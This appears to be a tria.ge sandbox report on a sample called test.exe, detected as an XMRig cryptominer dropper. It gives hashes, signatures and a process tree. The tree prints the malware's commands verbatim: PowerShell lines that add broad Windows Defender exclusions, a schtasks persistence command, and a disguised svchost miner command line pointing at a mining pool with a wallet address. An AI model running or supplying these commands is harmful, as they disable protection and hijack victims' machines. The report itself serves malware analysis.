Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1197s -
max time network
1188s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
04/09/2024, 18:22
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
test.exe
Resource
win7-20240729-en
Behavioral task
behavioral3
Sample
test.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
test.exe
Resource
win10v2004-20240802-en
General
-
Target
test.exe
-
Size
29.7MB
-
MD5
531a4e282c420c64d7b545a9c4e0fb4d
-
SHA1
998d298e9ff967bec6f03bf8e8e8f03b4b3728db
-
SHA256
98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
-
SHA512
c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730
-
SSDEEP
786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral3/memory/4768-162-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-165-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-167-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-171-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-170-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-169-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-168-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-221-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-223-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral3/memory/4768-222-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3676 powershell.exe 3624 powershell.exe 1928 powershell.exe 1792 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1896 services64.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3568 set thread context of 4768 3568 conhost.exe 91 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 3624 powershell.exe 3624 powershell.exe 3624 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe 4768 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3676 powershell.exe Token: SeIncreaseQuotaPrivilege 3676 powershell.exe Token: SeSecurityPrivilege 3676 powershell.exe Token: SeTakeOwnershipPrivilege 3676 powershell.exe Token: SeLoadDriverPrivilege 3676 powershell.exe Token: SeSystemProfilePrivilege 3676 powershell.exe Token: SeSystemtimePrivilege 3676 powershell.exe Token: SeProfSingleProcessPrivilege 3676 powershell.exe Token: SeIncBasePriorityPrivilege 3676 powershell.exe Token: SeCreatePagefilePrivilege 3676 powershell.exe Token: SeBackupPrivilege 3676 powershell.exe Token: SeRestorePrivilege 3676 powershell.exe Token: SeShutdownPrivilege 3676 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeSystemEnvironmentPrivilege 3676 powershell.exe Token: SeRemoteShutdownPrivilege 3676 powershell.exe Token: SeUndockPrivilege 3676 powershell.exe Token: SeManageVolumePrivilege 3676 powershell.exe Token: 33 3676 powershell.exe Token: 34 3676 powershell.exe Token: 35 3676 powershell.exe Token: 36 3676 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeIncreaseQuotaPrivilege 3624 powershell.exe Token: SeSecurityPrivilege 3624 powershell.exe Token: SeTakeOwnershipPrivilege 3624 powershell.exe Token: SeLoadDriverPrivilege 3624 powershell.exe Token: SeSystemProfilePrivilege 3624 powershell.exe Token: SeSystemtimePrivilege 3624 powershell.exe Token: SeProfSingleProcessPrivilege 3624 powershell.exe Token: SeIncBasePriorityPrivilege 3624 powershell.exe Token: SeCreatePagefilePrivilege 3624 powershell.exe Token: SeBackupPrivilege 3624 powershell.exe Token: SeRestorePrivilege 3624 powershell.exe Token: SeShutdownPrivilege 3624 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeSystemEnvironmentPrivilege 3624 powershell.exe Token: SeRemoteShutdownPrivilege 3624 powershell.exe Token: SeUndockPrivilege 3624 powershell.exe Token: SeManageVolumePrivilege 3624 powershell.exe Token: 33 3624 powershell.exe Token: 34 3624 powershell.exe Token: 35 3624 powershell.exe Token: 36 3624 powershell.exe Token: SeDebugPrivilege 3568 conhost.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeIncreaseQuotaPrivilege 1928 powershell.exe Token: SeSecurityPrivilege 1928 powershell.exe Token: SeTakeOwnershipPrivilege 1928 powershell.exe Token: SeLoadDriverPrivilege 1928 powershell.exe Token: SeSystemProfilePrivilege 1928 powershell.exe Token: SeSystemtimePrivilege 1928 powershell.exe Token: SeProfSingleProcessPrivilege 1928 powershell.exe Token: SeIncBasePriorityPrivilege 1928 powershell.exe Token: SeCreatePagefilePrivilege 1928 powershell.exe Token: SeBackupPrivilege 1928 powershell.exe Token: SeRestorePrivilege 1928 powershell.exe Token: SeShutdownPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeSystemEnvironmentPrivilege 1928 powershell.exe Token: SeRemoteShutdownPrivilege 1928 powershell.exe Token: SeUndockPrivilege 1928 powershell.exe Token: SeManageVolumePrivilege 1928 powershell.exe Token: 33 1928 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 4388 wrote to memory of 1912 4388 test.exe 74 PID 4388 wrote to memory of 1912 4388 test.exe 74 PID 4388 wrote to memory of 1912 4388 test.exe 74 PID 1912 wrote to memory of 1336 1912 conhost.exe 75 PID 1912 wrote to memory of 1336 1912 conhost.exe 75 PID 1912 wrote to memory of 2172 1912 conhost.exe 76 PID 1912 wrote to memory of 2172 1912 conhost.exe 76 PID 1336 wrote to memory of 3676 1336 cmd.exe 79 PID 1336 wrote to memory of 3676 1336 cmd.exe 79 PID 2172 wrote to memory of 220 2172 cmd.exe 80 PID 2172 wrote to memory of 220 2172 cmd.exe 80 PID 1336 wrote to memory of 3624 1336 cmd.exe 82 PID 1336 wrote to memory of 3624 1336 cmd.exe 82 PID 1912 wrote to memory of 4208 1912 conhost.exe 83 PID 1912 wrote to memory of 4208 1912 conhost.exe 83 PID 4208 wrote to memory of 1896 4208 cmd.exe 85 PID 4208 wrote to memory of 1896 4208 cmd.exe 85 PID 1896 wrote to memory of 3568 1896 services64.exe 86 PID 1896 wrote to memory of 3568 1896 services64.exe 86 PID 1896 wrote to memory of 3568 1896 services64.exe 86 PID 3568 wrote to memory of 60 3568 conhost.exe 87 PID 3568 wrote to memory of 60 3568 conhost.exe 87 PID 60 wrote to memory of 1928 60 cmd.exe 89 PID 60 wrote to memory of 1928 60 cmd.exe 89 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 3568 wrote to memory of 4768 3568 conhost.exe 91 PID 60 wrote to memory of 1792 60 cmd.exe 92 PID 60 wrote to memory of 1792 60 cmd.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:220
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
646B
MD5bf38f16ed068942cc8702d531b1650e5
SHA136c09a518beeb0db3d7e4cad6c2bbf1bc4f5ed90
SHA25672c9c0870bfec80a95bb63038304da81999329f6343e6b8069149ca535d49e10
SHA5121cbd6c7777301f24fd8cb2335004377370a8a24fadb0fa4bc61de814dd39a058ff2f419cefd462f30322eceb1ff17d3cd7cf1af97a8f1aaa3d00595129104368
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD573fdfb9dc99b3a859ced4fdcadd43d0e
SHA18b0b0446ebd85c323660ce40b0a2dbfda8ab7219
SHA256168068d4f6f1ffe55f4ac52442bcdd74c7ffe1a21a200dfc579a0738162de2b8
SHA51206bb3a382dbc28f0b311e5a5945503106eff5bf40b820a6a36fa8088299358cf6cfee410bc09aa55bc867bf56290973a6d1f75fe198562f629654cb2b60c9c2a
-
Filesize
1KB
MD54b396e31ba743838c9e8e6a95bd5ea42
SHA1e61d5b0b5dc4971247338a9f81c5a20b805fab0e
SHA256996879d073d5b879672f2df53c453ae9134184189bcb651105ed4fd60b199b34
SHA51246ec040d810eec3c9ade4dd4b8b605327ed52e5ea8f87a6b6161fe105f278b8f70a24ab227dc1913514a997adc4d4ca8e91cd4830872ca7a7cd59cb01c5ec13b
-
Filesize
1KB
MD5db57660ea1f4594299412c42472b74e4
SHA1542768a32d1dc530251f28999ee170a055b5f24d
SHA25649ae8602071913944ce9f68e02ef2ffc0d3f62f45e278aa1e391796cff3f7496
SHA512eaa5ad86c7f3ee8ab415151d86681d6f6d12eef4514191c34b6419c25b655b0e7cf79cc085d59c076f18421ccd168619ebbdf82cc5b1f30df9429b390d1ac2b7
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
29.7MB
MD5531a4e282c420c64d7b545a9c4e0fb4d
SHA1998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA25698ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730